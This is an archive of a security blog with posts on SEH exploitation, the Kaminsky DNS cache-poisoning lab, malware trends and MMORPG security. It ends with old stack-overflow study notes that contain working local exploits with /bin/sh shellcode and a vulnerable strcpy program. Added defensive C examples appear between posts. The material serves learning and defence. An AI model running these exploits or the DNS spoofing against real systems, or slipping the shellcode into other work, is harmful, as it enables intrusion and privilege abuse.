Week of Exploit Development Basics - Abusing the SEH

Posted in /home/research, /research/hacking_penetration on April 28th, 2011 by Rick Zhong

POP POP RET - sample assembly pattern for exploiting an SEH-based vulnerability. After too much high-level dealing with IS risk, metrics and governance, I found myself a nice SEH exploit development tutorial from the Corelan Team to satisfy my itch for the geeky stuff. Here it is - Link

Nice neat stuff with an actual vulnerable application - the SORITONG mp3 player. (I couldn’t find the original application package anywhere else, so I just registered on the Corelan Team site and downloaded the application.) Just a few notes in order to have a fully working exploit:

1. Make sure you use the memdump method (the 2nd method in the tutorial) when you try to locate a POP POP RET assembly pattern. I couldn’t locate any usable POP POP RET in player.dll and ended up with a “POP POP RET” at address 0x42103cdc. I am yet to determine whether this is a portable address or just hardcoded in my own XP machine.

2. Only “POP EDI POP ESI RET” will work; if register EBX or EBP is involved, your exploit will likely be broken. I still need to figure out the exact reason, but I guess popping into EBX or EBP will change the stack segment.
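A check I would run alongside note 1, from the defender's side, as an added example that is not from this post or the Corelan tutorial: a module whose PE header lacks the DYNAMIC_BASE flag is loaded at its preferred base on every machine (which is what makes an address found in it "portable"), and a module without NX_COMPAT does not request DEP. The code reads those DllCharacteristics bits with bounds checks on every offset it touches. The struct and function names and the minimal header builder are my own; the flag values and header offsets are the ones in the PE/COFF specification; the image built in main is constructed for the demonstration and is not a real DLL.

```c
/* Added example (not from the post or the Corelan tutorial): a hardening audit
 * of a PE module's DllCharacteristics flags. The image it parses below is a
 * constructed minimal header, not a real DLL. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Flag values from the PE/COFF specification. */
#define DLLCHAR_DYNAMIC_BASE 0x0040   /* opts into ASLR */
#define DLLCHAR_NX_COMPAT    0x0100   /* opts into DEP */
#define DLLCHAR_NO_SEH       0x0400   /* image uses no SEH handlers at all */

struct pe_mitigations {
    int valid;    /* 1 if the buffer parsed as a PE32/PE32+ image */
    int aslr;     /* DYNAMIC_BASE set */
    int dep;      /* NX_COMPAT set */
    int no_seh;   /* NO_SEH set */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walk MZ -> e_lfanew -> "PE\0\0" -> IMAGE_FILE_HEADER (20 bytes) -> optional
 * header; DllCharacteristics sits at optional-header offset 70 in both PE32
 * and PE32+. Every offset is checked against len before it is read. */
struct pe_mitigations pe_audit(const uint8_t *img, size_t len)
{
    struct pe_mitigations m = {0, 0, 0, 0};
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return m;
    uint32_t e_lfanew = rd32(img + 0x3c);
    if (e_lfanew > len || len - e_lfanew < 4 + 20 + 72) return m;
    const uint8_t *nt = img + e_lfanew;
    if (memcmp(nt, "PE\0\0", 4) != 0) return m;
    uint16_t opt_size = rd16(nt + 4 + 16);           /* SizeOfOptionalHeader */
    if (opt_size < 72) return m;
    uint16_t magic = rd16(nt + 24);
    if (magic != 0x10b && magic != 0x20b) return m;  /* PE32 or PE32+ */
    uint16_t dllchar = rd16(nt + 24 + 70);
    m.valid  = 1;
    m.aslr   = (dllchar & DLLCHAR_DYNAMIC_BASE) != 0;
    m.dep    = (dllchar & DLLCHAR_NX_COMPAT) != 0;
    m.no_seh = (dllchar & DLLCHAR_NO_SEH) != 0;
    return m;
}

/* Constructed minimal PE32 header: MZ stub, PE signature, file header and a
 * 96-byte optional header with only the fields the audit looks at filled in. */
size_t build_minimal_pe(uint8_t *buf, size_t cap, uint16_t dllchar)
{
    const size_t e_lfanew = 0x40, need = e_lfanew + 4 + 20 + 96;
    if (cap < need) return 0;
    memset(buf, 0, need);
    buf[0] = 'M'; buf[1] = 'Z';
    buf[0x3c] = (uint8_t)e_lfanew;
    uint8_t *nt = buf + e_lfanew;
    memcpy(nt, "PE\0\0", 4);
    nt[4] = 0x4c; nt[5] = 0x01;        /* Machine = i386 */
    nt[4 + 16] = 96; nt[4 + 17] = 0;   /* SizeOfOptionalHeader */
    nt[24] = 0x0b; nt[25] = 0x01;      /* Magic = PE32 */
    nt[24 + 70] = (uint8_t)(dllchar & 0xff);
    nt[24 + 71] = (uint8_t)(dllchar >> 8);
    return need;
}

int main(void)
{
    uint8_t img[256];
    /* an old-style module that asks for neither ASLR nor DEP */
    size_t n = build_minimal_pe(img, sizeof img, 0);
    struct pe_mitigations m = pe_audit(img, n);
    printf("legacy module: valid=%d aslr=%d dep=%d no_seh=%d\n", m.valid, m.aslr, m.dep, m.no_seh);
    /* a module linked with /DYNAMICBASE and /NXCOMPAT */
    n = build_minimal_pe(img, sizeof img, DLLCHAR_DYNAMIC_BASE | DLLCHAR_NX_COMPAT);
    m = pe_audit(img, n);
    printf("hardened module: valid=%d aslr=%d dep=%d no_seh=%d\n", m.valid, m.aslr, m.dep, m.no_seh);
    return 0;
}
```

To audit real modules, read the file into a buffer and hand it to pe_audit; a module reported without aslr or dep should be relinked with /DYNAMICBASE and /NXCOMPAT. SafeSEH itself is not a DllCharacteristics bit: confirming it means parsing the Load Config directory's SEHandlerTable, which this example does not do, so treat its output as a first pass.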

BTW, time to go back to explore the new features in Metasploit, which I haven’t had a chance to explore in depth since it was acquired by Rapid7. I’ve decided to play with a few fuzzing tools before coming back to exploit writing, just to make sure I am not getting bored.


Information Security - The 007 Style!

Posted in /etc/IT_security/news, /home/research on June 21st, 2010 by Rick Zhong

Recently the security industry has become more and more exciting and “cool” with various 007-style secret operations.

“Operation Dynamaphone” - Aug 3, a two-day operation by UK and Ireland police to crack down on a group of six individuals for pilfering funds from 10000 online banking accounts through phishing emails.

“Operation Pin Pad” - April 16 2010 Brazil PoS (Point-of-Sale)  Hack

“Operation b49” - Feb 2010 - A coordinated effort by Microsoft to take down the Waledac botnet, along with supporting experts from Shadowserver, the University of Washington, Symantec and others.

“Operation Aurora” - Quote from wiki

Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China.

The attack was named “Operation Aurora” by Dmitri Alperovitch, Vice President of Threat Research at cyber security company McAfee. Research by McAfee Labs discovered that “Aurora” was part of the file path on the attacker’s machine that was included in two of the malware binaries McAfee said were associated with the attack. “We believe the name was the internal name the attacker(s) gave to this operation,” McAfee Chief Technology Officer George Kurtz said in a blog post.

“Operation Bot Roast” - June 2007 - An initiative from the FBI to track down botnet owners; subsequently a number of high-profile charges were made against botnet owners globally.


OWASP Security Assurance Testing of Virtual Worlds Project

Posted in /home/MMORPG, /home/research on March 8th, 2010 by Rick Zhong

Finally I decided to give it a push and placed this part-time toy project to a bigger stage. I have registered this project with OWASP and I am pleasantly surprised by the level of support and encouragement from the OWASP folks. So here it goes - OWASP Security Assurance Testing of Virtual Worlds Project.

This project aims at creating a systematic and structured security framework for Virtual Worlds users (the gamers), third-party testers and developers. We already have very good security frameworks for generic application security (such as the OWASP Testing Guide); it’s time to zoom in on a specific category of application, in this case the Virtual Worlds created in various MMORPGs (Massively Multi-player Online Role Playing Games). If you ask me why I chose this specific type of application, I will say that I have a vision that one day, or even in the near future, virtual worlds will be an extension of the real world. They will be just like independent nations with their own economies, laws and regulations, political systems and social structures. A very simple example is that we may see virtual currencies come into real-world FX trading - we may see currency pairs like USDLID (LID -> Linden $ currency in Second World) or USDISK (ISK -> currency in Eve-online). This is definitely very exciting stuff and worth the efforts from all of us.

Lastly, a quote from Steve Jobs’ convocation speech (Stanford) -

“You can’t connect the dots looking forward; you can only connect them looking backwards. So you have to trust that the dots will somehow connect in your future. You have to trust in something: your gut, destiny, life, karma, whatever, because believing that the dots will connect down the road will give you the confidence to follow your heart, even when it leads you off the well-worn path, and that will make all the difference.”


Business Process Security - The Layer-8 of Information Security Model

Posted in /home/research, /opt/risk_management, /root/IT Management on August 14th, 2009 by Rick Zhong

I can’t believe this is the first entry in my blog for the past six months, and we are more than halfway through 2009. It has been … ‘busy’… (err.. I tend not to use this word because everyone is busy and it’s not really justifiable given the very diverse scales of measurement ..) Anyway, I have been travelling around the Asia Pacific region, meeting people from very different cultural backgrounds, professions, ways of thinking and lifestyles. It is fun, although there is frustration, boredom and stress. That’s part and parcel of life anyway.

The only reason which triggered me to sit down and write this post is the inspiration after reading a couple of articles in one of the backlog ISACA Journals. In the “HelpSource Q&A” section, there is a question on how to fight phishing attacks against online banking applications. Although I have been dealing with process-level controls for the past year, the words “attacks”, “applications”, “phishing” just trigger the technical, geeky style of problem-solving thinking in me, and ideas of strong 2-factor authentication, SPF (Sender Policy Framework), gateway spam filtering etc. immediately come into the picture.

However, the very first key control suggested is to have a properly defined e-mail communication policy for both sending and receiving emails to and from customers. Subsequently the advice mentioned a number of very good business process improvements which take fighting spam/phishing emails into consideration. A few small changes to a business process will easily mitigate a bunch of relevant security issues which technology alone finds difficult to tackle. It reminds me of those days when a great amount of effort and resources were spent on network-level controls in order to fight application-level security issues. Are we in the same situation nowadays, spending too much effort creating application-level or even information security process-level controls in order to tackle business process-level security issues?

I believe it’s time to introduce business process security into the information security model and make it a layer-8 practice. It is just like building security into the SDLC: we shall build security into a business process from the very beginning. The thought of having a whole new paradigm in the information security model is really exciting. I am sure this will bring drastic changes to the infosec industry - probably soon we will see business process-level security penetration testing, business process hardening etc.


From Storm to Conficker - A Changing Perception of Malware Developers

Posted in /etc/IT_security/news, /home/research, /var/rant on March 31st, 2009 by Rick Zhong

I have to admit that recent malware like Storm and Conficker has really impressed me - the various top-notch feature implementations and the strong skills and knowledge demonstrated. If you still think malware developers are a bunch who only know how to package published vulnerability POCs and insert the payloads into out-dated templates, you are probably still living in the pre-2004 era. Yeah, that’s not very long ago, but long enough for the information security industry to get rid of a bunch of old concepts and ideas. Here is the original description from SRI about the Conficker worm - Conficker Write-up.

One paragraph quoted from this write-up really sends a chill down the spine of most infosec folks.

“Finally, we must also acknowledge the multiple skill sets that are revealed within the evolving design and implementation of Conficker. Those responsible for this outbreak have demonstrated Internet-wide programming skills, advanced cryptographic skills, custom dual-layer code packing and code obfuscation skills, and in-depth knowledge of Windows internals and security products. They are among the first to introduce the Internet rendezvous point scheme, and have now integrated a sophisticated P2P protocol that does not require an embedded peer list. They have continually seeded the Internet with new MD5 variants, and have adapted their code base to address the latest attempts to thwart Conficker. They have infiltrated government sites, military networks, home PCs, critical infrastructure, small networks, and universities, around the world. Perhaps an even greater threat than what they have done so far, is what they have learned and what they will build next.”

While we - the infosec folks - are happily talking about nice-looking processes, management, frameworks etc., indulging ourselves in various fanciful security solutions full of marketing hoo-haa, we seem to forget about the fundamentals. Probably we need some form of wake-up call - before it is too late.


Your Nokia phone is ‘cursed’

Posted in /etc/IT_security/news, /home/research, /research/hacking_penetration on January 6th, 2009 by Rick Zhong

Nokia ‘curse of silence’ SMS details have been released by Tobias Engel. It is a simple SMS like ‘123456789@123456789.1234567890123’ sent in email format from most mobiles. Once you receive this SMS on your vulnerable Nokia smartphone (most Symbian S60s), it’s a gone case. A factory reset is required.

Exploit details:

http://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt


POC Setup for Kaminsky’s DNS Finding

Posted in /home/open-source, /home/research, /research/hacking_penetration on October 12th, 2008 by Rick Zhong

Last Thursday I gave a presentation on Dan Kaminsky’s recent DNS finding to the local security meetup group. It has been a while since I last laid my hands on network packet analysis and tweaking a bind9 server, and even BackTrack 3 looks fresh and interesting to me again.

Initially I thought it would be a huge task to set up a full POC environment for the DNS attack. I was planning and thinking about all the details such as the race conditions, a full-function attacker-controlled DNS server, segregation of the testing environment. However, the more I planned, the messier it became, until a point where I told myself - forget about it, this is not a huge corporate project which needs all the planning, risk analysis etc. etc. Let’s just be a normal script kiddie - get an available exploit, understand it and set up a minimum environment to try it; if it works, that’s it. If it doesn’t work, then we analyze what the problem is. This turned out to be a fantastic plan and again all my old friends - VMware, Ubuntu, Metasploit, Wireshark and BackTrack - came to the rescue. Here is the simple but fully workable setup (all in one Lenovo T61 laptop):

Vulnerable DNS server

  • Ubuntu 8.04 LTS Desktop Edition in VMware (server 1.06)
  • IP address: 192.168.1.13
  • with Bind9 packages installed
  • A little tweaking of the named options (fixed query source port and allow recursion to the attacker’s subnet, see attached named option files)

Attacker machine

  • BackTrack 3 Final in VMware (This is available directly from the home page; you don’t need to install it to the hard disk anymore)
  • IP address: 192.168.1.24
  • Update your Metasploit to make sure the auxiliary/spoof/dns/bailiwicked_host module is available

Client PC

  • Windows XP (The host machine which has the vmware-server installed)
  • IP address: 192.168.1.4
  • It just serves as a poor third-party DNS client who queries the vulnerable DNS server for IP info

The success rate for the POC is quite high: more than 70% of the spoof attacks (using the Metasploit module) were able to successfully inject the records into the vulnerable DNS server within 20 minutes. I have attached a copy of the Metasploit screen output and a corresponding Wireshark traffic dump for one of the POC attacks - making the vulnerable DNS server point www.jpmorgan.com to IP address 192.168.1.226.

The POC for this attack is pretty safe because the traffic is only routed within the LAN, except for the initial queries for the target’s DNS nameserver list. Anyway, the initial queries are entirely harmless because they are just normal DNS queries to a third-party DNS server. Lastly, Metasploit’s check for a recursive DNS server is a bit buggy. It throws out false negatives and always considers the vulnerable target DNS server “not vulnerable”. I am yet to find out the reason.
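The check behind this setup, from the resolver operator's side, as an added example that is neither from the post nor from Metasploit: the named option that makes the POC work pins the query source port, which leaves only the 16-bit transaction ID for an off-path spoofer to guess. Given the source ports and TXIDs seen on a resolver's outbound queries (assumed to be read from a capture such as the Wireshark dump attached below; the arrays here are constructed), the code reports whether each field looks randomized and how many bits a forged reply would have to match. The struct and function names and the thresholds in the verdict rule are my own choices.

```c
/* Added example (not from the post, nor from Metasploit): screen a resolver's
 * outbound queries for source-port and transaction-ID randomization. The
 * sample arrays are constructed; in practice they come from a capture of the
 * resolver's outbound port-53 traffic. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed samples: a resolver pinned to one query source port, one with
 * randomized source ports, random-looking TXIDs and incrementing TXIDs. */
const uint16_t SAMPLE_FIXED_PORTS[12] = {32768, 32768, 32768, 32768, 32768, 32768,
                                         32768, 32768, 32768, 32768, 32768, 32768};
const uint16_t SAMPLE_RANDOM_PORTS[12] = {51234, 3021, 60911, 17842, 44010, 9377,
                                          62004, 28456, 1331, 39588, 55201, 12790};
const uint16_t SAMPLE_TXIDS[12] = {0x1a2b, 0xf00d, 0x3c4d, 0x8e11, 0x0042, 0xbeef,
                                   0x5a5a, 0x7f01, 0xc3d2, 0x2e9a, 0x9981, 0x6b6c};
const uint16_t SAMPLE_SEQ_TXIDS[12] = {1000, 1001, 1002, 1003, 1004, 1005,
                                       1006, 1007, 1008, 1009, 1010, 1011};

struct field_stats {
    size_t samples;
    size_t distinct;
    uint16_t min, max;
    int randomized;   /* verdict: 1 = looks randomized */
};

static int ilog2(size_t x) { int b = 0; while (x > 1) { x >>= 1; b++; } return b; }

/* Count distinct values with a 64 KiB bitmap, record the span and flag pure
 * increments. Verdict rule (my own thresholds): at least 8 samples, not an
 * incrementing counter, at most 10% repeats, and a span of at least 1024. */
struct field_stats assess_field(const uint16_t *v, size_t n)
{
    static uint8_t seen[65536 / 8];
    struct field_stats s = {n, 0, 0xffff, 0, 0};
    int sequential = (n > 1);
    size_t span;
    memset(seen, 0, sizeof seen);
    for (size_t i = 0; i < n; i++) {
        uint8_t bit = (uint8_t)(1u << (v[i] & 7));
        if (!(seen[v[i] >> 3] & bit)) {
            seen[v[i] >> 3] |= bit;
            s.distinct++;
        }
        if (v[i] < s.min) s.min = v[i];
        if (v[i] > s.max) s.max = v[i];
        if (i > 0 && (uint16_t)(v[i] - v[i - 1]) != 1) sequential = 0;
    }
    if (n == 0) { s.min = 0; return s; }
    span = (size_t)s.max - s.min + 1;
    s.randomized = (n >= 8) && !sequential && (s.distinct * 10 >= n * 9) && (span >= 1024);
    return s;
}

/* Bits an off-path spoofer must match per forged reply. With a fixed port only
 * the TXID counts; that gap is why the POC lands within minutes. */
int guess_space_bits(const struct field_stats *port, const struct field_stats *txid)
{
    int bits = 0;
    if (port->randomized) bits += ilog2((size_t)port->max - port->min + 1);
    if (txid->randomized) bits += ilog2((size_t)txid->max - txid->min + 1);
    return bits;
}

static void report(const char *name, const struct field_stats *s)
{
    printf("%-13s samples=%zu distinct=%zu range=%u-%u randomized=%s\n", name,
           s->samples, s->distinct, s->min, s->max, s->randomized ? "yes" : "NO");
}

int main(void)
{
    struct field_stats fixed = assess_field(SAMPLE_FIXED_PORTS, 12);
    struct field_stats rnd_ports = assess_field(SAMPLE_RANDOM_PORTS, 12);
    struct field_stats txid = assess_field(SAMPLE_TXIDS, 12);
    struct field_stats seq = assess_field(SAMPLE_SEQ_TXIDS, 12);
    report("fixed ports", &fixed);
    report("random ports", &rnd_ports);
    report("random txids", &txid);
    report("seq txids", &seq);
    printf("spoofer must match %d bits with a fixed port, %d bits with random ports\n",
           guess_space_bits(&fixed, &txid), guess_space_bits(&rnd_ports, &txid));
    return 0;
}
```

The verdict is a coarse screen, not a statistical test: a resolver behind a NAT that rewrites source ports can pass the TXID check and still show a fixed port on the outside, so sample on the public side of any NAT. A patched resolver with no fixed query-source port configured should show both fields randomized.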

Bind9 Named Config Options:  namedconf.options

Metasploit Console Output: msf_output_jpmorgan

Meetup Slides: understand-kaminskys-dns-attacks-oct-2008.ppt


Blackhat 2008 USA Slides Available

Posted in /etc/IT_security/news, /home/research, /research/hacking_penetration on August 12th, 2008 by Rick Zhong

Fresh from the oven!!! Wondering where our dear friend Michael managed to source these treasures …

Full Set of Blackhat 2008 Vegas Conference Presentation Slides


Information Security in Virtual World

Posted in /etc/IT_security/news, /home/MMORPG, /home/research, /research/hacking_penetration on July 8th, 2008 by Rick Zhong

Recently we have seen some rapid growth of information security topics in the virtual world, typically relating to MMORPGs, both good and bad. For example, World of Warcraft is getting bank-like security while Game Trojans outscore Storm worm. It has been almost a year since I kicked off my part-time hobby research project on MMORPG security. The progress is rather slow but I am really enjoying the exploration process. It’s really amazing to witness the evolution of all the virtual worlds. Here are a couple of MMORPG security discussion topics I have raised among the local infosecurity interest groups.

Based on the current trend, more and more MMORPGs are no longer “games”; they have become a special type of social community. There is a newly published research survey from CNNIC (China Network Information Centre). The majority of users consider the virtual world a community and have a sense of identity and belonging.

Fig 1. The meaning of an MMORPG to users

Fig 2. What factors of an MMORPG are most valued by the users

This change in users’ perception of MMORPGs also reflects the growing importance of information protection in the virtual world and reminds the gaming industry to take it very seriously.


Digging out my old posts from sinfosec.org (3) - Exploits Writing Basics

Posted in /home/research, /research/hacking_penetration on June 30th, 2008 by Rick Zhong

This is another old post from my old forum. It reminds me of those exploits writing days! One day I will be back.

Posted: Tue Dec 13, 2005 10:56 pm
Post subject: Some notes taken when reading on stack overflow attacks

Summary of Stack Overflow Techniques

Basics

Memory layout of the stack area:

bottom of memory                                                   top of memory
            buffer2        buffer1        sfp(EBP)   ret     a      b      c
  <------  [            ][            ][         ][     ][     ][     ][     ]
top of stack (ESP)                                                bottom of stack

  1. Put the shellcode in the environment
  • This is commonly used when the buffer is too small to hold both the shellcode and the return address, or when the stack is non-executable.
  • The Linux environment address is fixed at 0xbffffffa, thus we can find the address of the shellcode placed in the environment.
  • In this case, the return address is at 0xbfffffce. Using “x/35b 0xbfffffce” in gdb, you will see the shellcode nicely placed in memory.

/* Rick: the following code is used to exploit the /bin/mail program in RH9; the cc field buffer size is 8214 */

/*
redhat 9.0 and some other linux have this vul.

# /bin/mail -s test -c `perl -e 'print "A"x9000'` root@localhost   <- you can see something wrong.

# I write this exploit just for fun, because "mail" is not suid.

code by OYXin (www.ph4nt0m.net)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execve */

#define BUFSIZE 8214

/* shellcode from s0t4ipv6@shellcode.com.ar */
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
                   "\x68\x2f\x62\x69\x6e\x89\xe3\x89"
                   "\x64\x24\x0c\x89\x44\x24\x10\x8d"
                   "\x4c\x24\x0c\x8b\x54\x24\x08\xb0"
                   "\x0b\xcd\x80";

int main(void)
{
    char buf[BUFSIZE + 16];
    char *prog[] = {"/bin/mail", "-s", "TEST", "-c", buf, "root@localhost", NULL};
    char *env[] = {"HOME=OYXin", shellcode, NULL};
    /* guess where the shellcode lands in the environment block at the top of the stack */
    unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) - strlen(shellcode) - 0x02;
    /* unsigned long ret = 0xbffffffa - strlen(prog[0]) - strlen(shellcode); */

    memset(buf, 0x41, sizeof(buf));
    memcpy(buf + BUFSIZE, (char *)&ret, 4);        /* overwrite the saved return address */
    memcpy(buf + BUFSIZE + 4, (char *)&ret, 4);
    memcpy(buf + BUFSIZE + 8, (char *)&ret, 4);
    buf[BUFSIZE + 12] = 0x00;

    execve(prog[0], prog, env);
    return 0;
}

/* you must enter "." and a return to get a shell. */

  • Another commonly seen situation is to put the shellcode in the environment manually (by exporting a Perl-generated string, etc.), then pass its address to the vulnerable program as an argument.

A small program can help you get the environment variable’s address. For each extra character in the executable file name, the address will differ by 2 bytes. (Don’t forget the stack grows towards lower memory addresses :P)

#include <stdio.h>    /* printf */
#include <stdlib.h>   /* getenv, exit */

int main(int argc, char *argv[])
{
    char *addr;

    if (argc < 2) {
        printf("Usage:\n%s <environment variable name>\n", argv[0]);
        exit(0);
    }

    addr = getenv(argv[1]);
    if (addr == NULL)
        printf("The environment variable %s doesn't exist.\n", argv[1]);
    else
        printf("%s is located at %p\n", argv[1], addr);

    return 0;
}

  2. Put the shellcode in the stack

This is the most “traditional” way, introduced in Aleph One’s “Smashing the Stack for Fun and Profit”. However, it has become ineffective in newer versions of various OSes due to the various protection techniques implemented. The general idea is:

    - Construct an EGG with NOP padding, the shellcode in the centre and the return address (pointing to the shellcode or the NOP padding) in the last part of the EGG. (From Rick: EGG sounds cute and is a nice name.. don’t know who first thought of this idea?)
    - Guessing the return address will be tricky. (See the code below, which targets vulnerable.c: it creates the EGG, puts the EGG in an environment variable and later uses it as an argument to vulnerable.c.)

However, this code is not effective on Red Hat 9.0 kernel 2.4.20-31.9 because the stack pointer (ESP) is not static in this kernel. It is dynamic and random to a certain extent, based on the process number.

/* this is the vulnerable.c */
#include <string.h>

int main(int argc, char *argv[]) {
    char little_array[512];

    if (argc > 1)
        strcpy(little_array, argv[1]);   /* unbounded copy: this is the overflow */
    return 0;
}
/* end of the vulnerable.c */
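vulnerable.c beside its hardened form, as an added example that is not from the forum post or the Shellcoder’s Handbook: the defect is not the 512-byte array but that strcpy never sees its size. The replacement copy takes the destination size, rejects any argument that does not fit together with its terminator, and leaves the buffer NUL-terminated either way; a second helper shows why the usual half-fix, strncpy with the destination size, is not enough. The function names (copy_bounded, handle_argument, strncpy_terminates) are my own.

```c
/* Added example (not from the forum post or the Shellcoder's Handbook):
 * the hardened counterpart of vulnerable.c. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define LITTLE_ARRAY_SIZE 512

/* 0 on success, -1 if src (plus its NUL) does not fit in dstsz bytes.
 * On failure dst holds an empty string rather than a truncated copy, so a
 * caller that ignores the result still has a terminated buffer. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    if (dst == NULL || dstsz == 0) return -1;
    if (src == NULL) { dst[0] = '\0'; return -1; }
    while (n < dstsz && src[n] != '\0') n++;   /* never reads past dstsz bytes of src */
    if (n == dstsz) {                          /* no terminator within the limit: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);                   /* n + 1 includes the NUL */
    return 0;
}

/* The same shape as vulnerable.c with the bounded copy in place of strcpy.
 * Returns the copied length, or -1 when the argument was rejected. */
int handle_argument(const char *arg)
{
    char little_array[LITTLE_ARRAY_SIZE];
    if (copy_bounded(little_array, sizeof little_array, arg) != 0)
        return -1;
    return (int)strlen(little_array);
}

/* The common half-fix: strncpy(dst, src, dstsz) writes no terminator when src
 * fills dst, so the next strlen or printf on dst runs off its end. Returns 1
 * if dst ended up NUL-terminated, 0 if not, -1 if dstsz exceeds the scratch
 * buffer. The scratch buffer is pre-filled with 'X' so no stray NUL is left. */
int strncpy_terminates(size_t dstsz, const char *src)
{
    char dst[64];
    if (dstsz > sizeof dst) return -1;
    memset(dst, 'X', sizeof dst);
    strncpy(dst, src, dstsz);
    return memchr(dst, '\0', dstsz) != NULL;
}

int main(int argc, char *argv[])
{
    if (argc > 1) {
        int r = handle_argument(argv[1]);
        if (r < 0)
            fprintf(stderr, "argument too long (limit %d bytes)\n", LITTLE_ARRAY_SIZE - 1);
        else
            printf("copied %d bytes\n", r);
    }
    printf("strncpy with 8-byte limit: \"hello\" terminated=%d, \"12345678\" terminated=%d\n",
           strncpy_terminates(8, "hello"), strncpy_terminates(8, "12345678"));
    return 0;
}
```

The size is taken with sizeof in the scope where the array is declared; once the buffer is passed on as a pointer the size has to travel with it as a separate parameter, which is the discipline copy_bounded enforces.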

/* This is the exploit */

/*
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
Sinan Eren, Neel Mehta, Riley Hassell

Publisher: John Wiley & Sons
ISBN: 0764544683

Chapter 2: Stack Overflows
Sample Program #6

Please send comments/feedback to jack@infosecinstitute.com or visit
http://www.infosecinstitute.com
*/

#include <stdio.h>    /* printf */
#include <stdlib.h>   /* malloc, atoi, exit, putenv, system */
#include <string.h>   /* strlen, memcpy */

#define offset_size 0
#define buffer_size 512

char sc[] =
    "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
    "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
    "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* returns the current stack pointer: the asm leaves ESP in EAX, which is the
   return register on 32-bit x86 (compiler-specific; there is no explicit return) */
unsigned long find_start(void) {
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = offset_size, bsize = buffer_size;
    int i;

    if (argc > 1) bsize  = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    /* the missing memory allocation code in the original code, maybe just a printing error,
       by Rick */
    /* placed after the argument parsing so the allocation matches the bsize actually used */
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = find_start() - offset;
    printf("Attempting address: 0x%lx\n", addr);

    /* fill the whole buffer with the guessed return address ... */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* ... then place the shellcode right after the first word */
    ptr += 4;
    for (i = 0; i < strlen(sc); i++)
        *(ptr++) = sc[i];

    buff[bsize - 1] = '\0';
    memcpy(buff, "BUF=", 4);
    putenv(buff);              /* export the EGG as $BUF for the shell below */
    system("/bin/bash");
    return 0;
}
  3. Return to libc